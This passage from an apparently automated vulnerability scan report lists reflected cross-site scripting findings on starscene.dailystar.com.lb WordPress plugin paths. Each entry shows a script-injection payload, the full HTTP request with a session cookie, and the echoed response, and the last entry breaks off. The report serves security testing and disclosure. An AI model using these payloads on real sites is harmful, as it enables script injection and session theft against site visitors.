4.291. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/sociable/addtofavorites.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a122"><script>alert(1)</script>7fd0f0415b4 was submitted in the REST URL parameter 3. This input was echoed as 5a122\"><script>alert(1)</script>7fd0f0415b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable5a122"><script>alert(1)</script>7fd0f0415b4/addtofavorites.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:19 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/sociable5a122\"><script>alert(1)</script>7fd0f0415b4/addtofavorites.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.292. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/sociable/addtofavorites.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23774"><script>alert(1)</script>ff723871d47 was submitted in the REST URL parameter 4. This input was echoed as 23774\"><script>alert(1)</script>ff723871d47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable/addtofavorites.js23774"><script>alert(1)</script>ff723871d47?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:04 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/sociable/addtofavorites.js23774\"><script>alert(1)</script>ff723871d47?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.293. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d31"><script>alert(1)</script>f9090a69f3c was submitted in the REST URL parameter 1. This input was echoed as b2d31\"><script>alert(1)</script>f9090a69f3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentb2d31"><script>alert(1)</script>f9090a69f3c/plugins/sociable/sociable.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:10:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:44 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentb2d31\"><script>alert(1)</script>f9090a69f3c/plugins/sociable/sociable.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.294. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8fc8"><script>alert(1)</script>c3d97fdb428 was submitted in the REST URL parameter 2. This input was echoed as f8fc8\"><script>alert(1)</script>c3d97fdb428 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf8fc8"><script>alert(1)</script>c3d97fdb428/sociable/sociable.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:55 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsf8fc8\"><script>alert(1)</script>c3d97fdb428/sociable/sociable.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.295. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5864b"><script>alert(1)</script>079c87b45a3 was submitted in the REST URL parameter 3. This input was echoed as 5864b\"><script>alert(1)</script>079c87b45a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable5864b"><script>alert(1)</script>079c87b45a3/sociable.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:14 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/sociable5864b\"><script>alert(1)</script>079c87b45a3/sociable.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.296. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e908b"><script>alert(1)</script>d798268978b was submitted in the REST URL parameter 4. This input was echoed as e908b\"><script>alert(1)</script>d798268978b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable/sociable.csse908b"><script>alert(1)</script>d798268978b?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/sociable/sociable.csse908b\"><script>alert(1)</script>d798268978b?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.297. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/world-cup-predictor/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b02"><script>alert(1)</script>1abba2b880f was submitted in the REST URL parameter 1. This input was echoed as 47b02\"><script>alert(1)</script>1abba2b880f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content47b02"><script>alert(1)</script>1abba2b880f/plugins/world-cup-predictor/css/style.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:46 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content47b02\"><script>alert(1)</script>1abba2b880f/plugins/world-cup-predictor/css/style.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.298. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/world-cup-predictor/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9513"><script>alert(1)</script>d24334c8c0c was submitted in the REST URL parameter 2. This input was echoed as e9513\"><script>alert(1)</script>d24334c8c0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginse9513"><script>alert(1)</script>d24334c8c0c/world-cup-predictor/css/style.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:59 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginse9513\"><script>alert(1)</script>d24334c8c0c/world-cup-predictor/css/style.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.299. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/world-cup-predictor/css/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7857"><script>alert(1)</script>6753ffa0f83 was submitted in the REST URL parameter 3. This input was echoed as d7857\"><script>alert(1)</script>6753ffa0f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictord7857"><script>alert(1)</script>6753ffa0f83/css/style.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:44 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictord7857\"><script>alert(1)</script>6753ffa0f83/css/style.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.300. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/world-cup-predictor/css/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1af4"><script>alert(1)</script>4c08046b926 was submitted in the REST URL parameter 4. This input was echoed as f1af4\"><script>alert(1)</script>4c08046b926 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictor/cssf1af4"><script>alert(1)</script>4c08046b926/style.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:16:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:16:29 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:16:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictor/cssf1af4\"><script>alert(1)</script>4c08046b926/style.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.301. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/world-cup-predictor/css/style.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f277"><script>alert(1)</script>ed00e9a8766 was submitted in the REST URL parameter 5. This input was echoed as 3f277\"><script>alert(1)</script>ed00e9a8766 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictor/css/style.css3f277"><script>alert(1)</script>ed00e9a8766?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:08 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictor/css/style.css3f277\"><script>alert(1)</script>ed00e9a8766?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.302. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/world-cup-predictor/js/wcp.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95530"><script>alert(1)</script>c4240e06647 was submitted in the REST URL parameter 1. This input was echoed as 95530\"><script>alert(1)</script>c4240e06647 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content95530"><script>alert(1)</script>c4240e06647/plugins/world-cup-predictor/js/wcp.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
